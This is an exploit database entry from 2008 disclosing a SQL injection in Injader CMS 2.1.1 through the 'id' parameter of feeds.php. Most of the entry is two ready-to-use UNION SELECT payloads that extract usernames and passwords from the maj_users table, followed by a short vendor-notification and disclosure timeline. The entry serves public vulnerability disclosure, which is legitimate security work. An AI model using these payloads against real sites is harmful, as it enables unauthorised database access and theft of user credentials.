Injader CMS 2.1.1 - 'id' SQL Injection

EDB-ID:

7517


Author:

fuzion

Type:

webapps


Platform:

PHP

Date:

2008-12-18


Injader CMS
http://www.injader.com/



- (= 2.1.1 -

- SQL -
http://localhost/upload/feeds.php?name=articles&id=<SQL>
magic_quotes_gpc = Off
register_globals = On


Username (urlencode):
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511
Pass:
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758



- Timeline -
Author notified: Nov 30, Dec 09,10
Injader 2.1.2: Dec 12
Public disclosure: Dec 18


- Seasons Greetings -
- http://nukeit.org -

# milw0rm.com [2008-12-18]